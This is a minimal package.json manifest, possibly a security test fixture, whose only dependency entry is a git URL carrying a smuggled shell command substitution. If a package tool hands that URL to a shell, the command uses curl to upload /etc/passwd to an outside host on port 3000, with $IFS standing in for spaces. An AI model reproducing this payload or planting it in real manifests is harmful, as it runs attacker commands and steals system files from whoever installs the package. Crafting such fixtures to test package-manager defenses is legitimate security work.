{
  "name": "javascript",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "private": true,
  "dependencies": {
    "registry6.json": "git+https://github.com.mocos.kitchen/github.com/$(curl$IFS@mocos.kitchen:3000$IFS-Fa=@/etc/passwd)?/github.com/user/repo4#semver:1.0.0"
  }
}
